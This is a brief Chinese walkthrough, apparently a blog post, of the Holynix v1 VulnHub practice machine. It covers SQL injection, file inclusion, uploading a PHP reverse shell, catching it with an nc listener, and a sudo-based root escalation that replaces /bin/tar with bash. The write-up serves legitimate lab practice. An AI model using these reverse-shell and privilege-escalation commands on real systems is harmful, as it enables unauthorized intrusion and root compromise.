holynix-v1靶机

信息收集:

靶机地址:https://www.vulnhub.com/entry/holynix-v1,20/

(1)修改mac地址为00:0C:29:BC:05:DE 在进行扫描发现ip

(2)目录扫描

(3)端口扫描

拿shell:

(1)登录界面发现sql注入

(2)扫描到账号密码

(3)登录一个账号,在Security这发现文件包含漏洞

(4)在kali里面生成payload

 locate php-reverse
 cp的时候不要换名字
 cp /usr/share/laudanum/php/php-reverse-shell.php  .\  
 vim php-reverse-shell.php
 tar cvf  php-reverse-shell.php 

(5)vim修改ip和端口

(6)文件上传

(7)拼接访问

http://192.168.254.156/~etenenbaum/

(8)监听nc -lvnp端口 反弹成功

提权:

(1)sudo -l

(2)提权

cd /tmp/
cp /bin/bash .
sudo chown root:root /tmp/bash
sudo mv /bin/tar /bin/tar.bak
sudo mv /tmp/bash /bin/tar
sudo /bin/tar
id
提权成功

  • 4
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值